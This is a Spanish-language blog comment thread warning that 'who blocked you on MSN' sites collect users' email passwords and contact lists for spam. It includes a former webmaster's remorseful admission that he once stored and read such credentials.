Ciertamente que otros me espíen no le resta importancia a que estas páginas lo hagan. Esto es volver al juego de acusar al vecino para minimizar la propia culpa. Y la verdad, ese método junto al del insulto fácil que tanto os gusta usar cuando no tenéis nada que argumentar para vuestra causa, os deja a vosotros en el papel de “nenes llorones” y no a mí, que me limito a aconsejar a los usuarios a tomar precauciones contra páginas fraudulentas y engañosas (¿o me vas a decir que tu página si es capaz de decir quien me ha quitado la admisión? Fíjate, de eso sí que quiero ver pruebas concretas y las únicas que existen son exactamente de lo contrario: demostrando que no funcionan )

En lo único que te doy la razón es que hay mucha gente ilusa, y de ellas os aprovecháis los dueños de este tipo de página para hacer dinero. Y por eso os molesta tanto que haya gente que les diga la verdad.

Decime para que voy a querer yo tu cuenta de mail y contraseña de msn si ni siquiera se quien sos? ni me interesa saberlo, no necesito ser de cuarta y vender una supuesta base de datos de mails a spammers, que dicho sea de paso pagan muy poco, aparte que de todas formas los spammers conseguiran tu direccion de mail, acaso no recibes spam todos los dias? pero como!, si eres un rey de la seguridad!, estas acusando sin fundamentos, solo porque tu SUPONES que roban claves, pero, que pruebas tienes? como lo puedes demostrar?, acaso esta marcado como un sitio de phishing por ie7 o ff?, acaso lo estan? acaso esta marcado por microsoft como que roban identidad?, hablas mucho pero demostras poco, ese link no dice nada, solo un nene hablando pavadas, obvio un nene que no tiene vida, acaso hi5 no pide tus claves? acaso en los foros no piden tu mail? acaso aqui no te han pedido tu mail?, que ridiculos son algunos personajes de por aqui…

Este individuo en cuestión trata de convencernos de dos cosas principalmente. La primera que es lo mismo dar una dirección de correo para realizar un registro en un sitio web como puede ser un foro o una red social, que dar la dirección de correo y la contraseña para acceder a dicho correo. Para quien no entienda la “sutil” diferencia digamos que es lo mismo que decirle a un desconocido la dirección de nuestra casa y darle una copia de la llave. ¿A quien se le ocurriría hacerlo?

La segunda es que no recopila las direcciones de email de los usuarios de su sitio para saber quien te ha bloqueado en el Messenger, ni de sus contactos. Y para convencernos nos dice que no tiene necesidad de vender dichas direcciones de correo a spammers porque además pagan muy poco. Pero, ¿como es posible que sepa que pagan muy poco si no ha tratado de vender listas de direcciones de correo electrónico a ningún spammer?

Para acabar contestaré diciendo que Internet Explorer (IE), FireFox (FF), o Microsoft no se si marcarán estos sitios como fraudulentos o de phishing (robo de contraseñas), pero varios antivirus y empresas de seguridad informática sí que lo hacen.

Así que queda comprobado que la verdad duele, sobre todo cuando se trata de destapar los engaños con que estos individuos se ganan la vida, y como no saben que responder pues necesitan distraer con sus comentarios acusando, descalificando, o intentando cambiar de tema (lo que comunmente se conoce como “echar balones fuera”). Y a ninguno de ellos le interesa hablar sobre el tema de demostrar que su página funciona y es capaz de decir quien te ha quitado la admisión. ¿No es eso lo mas importante SeNdEr2003?

Muy lamentable haber encontrado este artículo en fecha tan tardía como la presente. Realmente interesante el tema expuesto. Soy webmaster con experiencia en PHP. Yo he utilizado varios scripts con la misma finalidad de obtener el listado de los contactos de msn, gmail, yahoo, aol, y otros. Ése es el motivo real de páginas como QuienTeAdmite.com. Sí, quien utiliza estos scripts tiene la posibilidad de almacenar el usuario y contraseña, además de la lista de contactos que se genera. Personalmente estoy 100% seguro de que las sitios que ofrecen este servicio almacenan estos valiosos datos. ¿Por qué? Porque es posible, y porque hacerlo genera beneficios.

Hay quienes han argumentado que no almanecenan los datos de los usuarios por la supuesta razón de que ganan suficiente con los adsenses de google. Pero para ganar suficiente con los adsenses, necesitan muchisimas visitas. ¿Cómo obtienen tantas visitas? Enviando spam a todos los emails recolectados de las cuentas de los usuarios.

Yo mismo me preguntaba cómo es posible que haya tanta gente que se confíe en dejar datos privados de cuentas de correo en una paginita de internet como quienteadmite.com. Pero lo hacen!

Actualmente no utilizo estos scripts; he crecido y tengo otros intereses y otros compromisos. Pero cuando me dedicaba a la programación web, y almacenaba datos de usuarios, llegué a entrar en correos de hotmail -ya ofrecidos por los usuarios-, y llegué a leer correos sin su autorización.

Sé que estuvo mal, y no me siento bien por ello. Pero cada usuario en la red debe saber que esto es posible, que es un frade, y que está sucediendo; sucede con sus datos y con los datos de sus contactos.

Entonces, si es posible almanecenar los datos privados de los usuarios -que ciertamente lo es-, y tomando en cuenta que hacer tal cosa genera beficios económicos, por qué razón un webmaster no lo haría? ¿Por que ya tiene suficiente dinero? ¿Por que tiene fuertes principios morales y de conciencia? Por favor! Si tuviera suficiente dinero no se dedicara a hacer paginitas de internet para recolectar emails; y si fuera por principios morales, no ofreciera a los usuarios un servicio cuyo supuesto objetivo es simplemente imposible.

Me molesta que haya gente haciendo páginas con este engaño, asegurándole al usuario que no almacenan sus datos, cuando realmente sí lo hacen, y lo sé porque yo mismo lo hacía. Pero me sorprende más que cientos de miles de usuarios caigan en la estafa.

Quien haya visitado uno de estos sitios, y haya ingresado su email y contraseña, debería cambiar su password. Aunque lamentablemente ya enlistó a todos sus contactos en la base de datos de estos sitios web.

Asi que aunque el mismo dueño diga que es seguro o cualquier persona, son puras patrañas como diria Bart.

Los webmasters verdaderos son personas ambiciosas, ventajeras, competitivas, quieren tener todo a su alcance para hacer crecer sus proyectos, difundirlos, ganar dinero, en el fondo de su alma adoran el spam y hacen maldades, se los digo porque YO SOY UNO.

lo bueno ke ypo jamas he entrado con mis cuentas, lo hice una vez, pero tuve ke krearme una cuenta “fantasma” para poder saber k se hacia con eso, y agrege nada mas 3 emails de X personas, ke pedi ke me agregaran al azar en un servidor de IRC y pss entonces TODAS me aceptaron, y pedi ke 1 sola me pusiera en no admitir…

resulta ke cuando hice el “test” la ke me puso no admitir salio ke si, y otra mas salio ke me habia eliminado y la otra como no conectada.. siendo ke las estaba viendo por el msn en ese mismo rato a las 3 y charlando con ellas WOa!!!

deberasn ke estan bien pendejos a los de quienteadmite.com y demas paginass, como kiera ya las reporte desde siempre a las nic, mexico y a otras mas ke se encargan de investigar este tipo de paginuchas

gracias por el blog, me ha servido de mucho ya ke se lo paso a amigos ke veo ke han caido en la mentira de las paginuchas x-D

“¿como podemos luchar contra el SPAM si somos nosotros mismo kien lo difunde?”

unamonos a una causa para poder acabar con todo el SPAM

saludos desde mexico

Muchas veces he cometido el error de dejar datos en algunas paginas web, con la sorpresa de que cuando me conecto al messenger hay contactos que obviamente son creados por un sistema, donde sale mira mis fotos desnuda y esas cosas. O entro al hotmail y veo mi buzon lleno de spam.

La verdad la gente de quienteadmite esta en todo su derecho de trabajar pero sin necesidad de usufructuar de nombres como Microsoft o MSN lo que sea. Pero bueno si a mi me da la gana de bloquearle a un psicopata que me acosa o yo que se, paginas como esta me estan quitando la privacidad, pues es mi derecho bloquear sin que se enteren. Ocurre q una vez bloquie a una ex porq me amenazaba con ciertas vainas q no valen la pena decir, la bloquie me agrego con otro nombre y siguio con el tema de q se entero q le bloquie.. si señores es un atentado a la privacidad y eso nadie lo puede discutir.

Y no se entera nadie de quien le bloquea o no, es imposible. Por eso estas páginas son una estafa y un engaño para todos los credulos que las usan. Otra cosa es que te agregue esa persona con otro nombre y tu la aceptes. Chico, entonces te ha pillado enterito, pero la culpa ha sido tuya